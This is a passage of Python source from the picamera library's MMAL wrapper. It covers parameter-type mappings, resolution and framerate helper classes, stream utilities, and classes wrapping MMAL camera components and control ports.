mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *bufffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
